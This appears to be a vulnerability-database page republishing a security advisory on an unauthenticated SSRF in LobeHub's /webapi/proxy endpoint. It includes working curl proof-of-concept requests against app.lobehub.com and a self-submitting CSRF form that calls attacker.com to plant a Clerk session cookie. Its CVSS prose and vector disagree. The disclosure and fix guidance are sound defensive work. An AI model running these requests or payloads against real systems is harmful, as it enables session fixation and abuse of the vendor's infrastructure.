Severity by source
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H
Network-reachable endpoint with no auth (PR:N, AV:N, AC:L); cookie injection across app.lobehub.com→lobehub.com is a scope change with high integrity impact, limited confidentiality via SSRF info leak, no availability impact.
Primary rating from Vendor (https://github.com/lobehub/lobehub).
CVSS VectorVendor: https://github.com/lobehub/lobehub
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H
Lifecycle Timeline
3DescriptionCVE.org
Unauthenticated SSRF in /webapi/proxy allows anyone to proxy requests and inject cookies on lobehub.com
Summary
The /webapi/proxy endpoint on app.lobehub.com accepts a URL in the POST body and fetches it server-side without any authentication. This is the same proxy code that was vulnerable in CVE-2024-32964, where /api/proxy was fixed by adding auth middleware. The /webapi/proxy route was never secured - it is the only webapi route missing the checkAuth() wrapper. An attacker can use this to make arbitrary outbound requests from LobeHub's infrastructure, leak Vercel deployment details, and inject cookies on the lobehub.com domain through reflected Set-Cookie headers.
Vulnerability Details
Type: Server-Side Request Forgery (CWE-918) Affected Endpoint: POST /webapi/proxy Vulnerable File: src/app/(backend)/webapi/proxy/route.ts
The route handler reads a URL from the request body and passes it to ssrfSafeFetch() without calling checkAuth() first. Every other webapi route (/webapi/chat/*, /webapi/models/*, /webapi/create-image/*) wraps the handler in checkAuth(), but the proxy does not. The Next.js middleware also skips /webapi/ routes - defaultMiddleware() calls NextResponse.next() for any path starting with /webapi/, so neither the route handler nor the middleware performs authentication.
Steps to Reproduce
Fetch an external URL through the proxy (no auth, no cookies, no tokens):
curl -X POST -H "Content-Type: text/plain;charset=UTF-8" \
-d "https://httpbin.org/ip" \
"https://app.lobehub.com/webapi/proxy"<img width="1069" height="297" alt="image" src="https://github.com/user-attachments/assets/4fa7ffe9-fe4f-4752-875a-cb3fa79c3c18" />
Response:
{"origin": "3.14.141.44"}This is the IP of LobeHub's Vercel serverless function. The proxy fetched httpbin.org and returned the full response body.
Inject a cookie on the lobehub.com domain:
curl -D- -X POST -H "Content-Type: text/plain;charset=UTF-8" \
-d "https://httpbin.org/response-headers?Set-Cookie=__session%3Dmalicious%3BPath%3D%2F%3BDomain%3Dlobehub.com%3BSecure%3BHttpOnly" \
"https://app.lobehub.com/webapi/proxy"The response headers include:
set-cookie: __session=malicious;Path=/;Domain=lobehub.com;Secure;HttpOnly<img width="1215" height="340" alt="image" src="https://github.com/user-attachments/assets/f0710685-edb8-4cc9-8162-27f0ba911903" />
The proxy passes upstream response headers straight through (only stripping Content-Encoding and Content-Length). An attacker controls the upstream server, so they control which Set-Cookie headers are reflected. The __session and __clerk_db_jwt cookies are both injectable - these are the cookie names used by Clerk for authentication.
CSRF to cookie injection (no user interaction beyond visiting a page):
An attacker hosts the following HTML. When a victim opens it, the browser submits a form to the proxy, which fetches the attacker's server. The attacker's server responds with a Set-Cookie header, and the proxy reflects it. The victim's browser sets the cookie on lobehub.com because the response comes from app.lobehub.com.
<form id=f action="https://app.lobehub.com/webapi/proxy"
method=POST enctype="text/plain">
<input name="https://attacker.com/inject?x" value="">
</form>
<script>f.submit()</script>The attacker's server at /inject?x= responds with Set-Cookie: __session=KNOWN_VALUE; Path=/; Domain=lobehub.com; Secure; HttpOnly. The proxy reflects this header and the victim's browser stores the cookie.
Impact
The proxy is fully unauthenticated and returns the complete response from any external URL. I confirmed the following on app.lobehub.com:
An attacker can inject authentication cookies (__session, __clerk_db_jwt, __client_uat) on the lobehub.com domain by chaining CSRF with the proxy's reflected Set-Cookie headers. If LobeHub uses Clerk for session management, this is a session fixation vector - the attacker sets a known session value before the victim logs in, then uses that same value to access the victim's session.
The proxy also leaks Vercel infrastructure details. The Traceparent and X-Vercel-Id headers from internal request tracing appear in every proxied response. The server's egress IP is exposed. Vercel Edge Config and the Vercel API are both reachable through the proxy (they return auth errors, not SSRF blocks), which means the proxy reaches Vercel's management plane.
The endpoint has no rate limiting. An attacker can use LobeHub's infrastructure as an anonymous proxy for scanning, phishing, or abusing IP-based trust relationships with third-party services.
Recommended Fix
Add checkAuth() to the proxy route, matching every other webapi route:
- export const POST = async (req: Request) => {
+ export const POST = checkAuth(async (req, { userId }) => {If the proxy is only needed for client-side URL previews, consider removing the endpoint entirely and handling previews in the browser.
AnalysisAI
Unauthenticated server-side request forgery in LobeHub's /webapi/proxy endpoint (versions <= 2.1.56) allows any remote attacker to proxy arbitrary HTTP requests through LobeHub's infrastructure and inject attacker-controlled Set-Cookie headers onto the lobehub.com domain. The flaw stems from the route handler omitting the checkAuth() wrapper that protects every other webapi route, enabling SSRF, infrastructure reconnaissance against Vercel internals, and a CSRF-to-session-fixation chain against Clerk auth cookies. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires only that the LobeHub instance expose the `POST /webapi/proxy` route in a vulnerable version (<= 2.1.56) and that the route reaches the internet - no authentication, no user account, no cookies, and no special configuration are required for the raw SSRF and Set-Cookie reflection (the reporter demonstrated this on the default-configured production app.lobehub.com with `curl`). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Real-world risk is high and the supplied CVSS 9.0 score understates one important dimension while overstating another. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker hosts a small HTML page that auto-submits a `text/plain` form to `https://app.lobehub.com/webapi/proxy` pointing at their controlled server, which replies with `Set-Cookie: __session=KNOWN_VALUE; Domain=lobehub.com; Path=/; Secure; HttpOnly`. When any victim visits the page, the proxy reflects the header and the victim's browser stores the attacker-chosen Clerk session cookie on `lobehub.com`; the attacker, holding the same session value, can ride the victim's subsequent login as a session-fixation attack. … |
| Remediation | Upgrade `@lobehub/lobehub` to vendor-released patch version 2.1.57 or later, which adds the missing `checkAuth()` wrapper to `src/app/(backend)/webapi/proxy/route.ts` consistent with the other webapi routes; the advisory at https://github.com/lobehub/lobehub/security/advisories/GHSA-xmwj-c75x-6346 is the authoritative reference. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: inventory all LobeHub instances and document versions; restrict or disable public access to the /webapi/proxy endpoint via network controls or WAF if operationally feasible. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38555
GHSA-xmwj-c75x-6346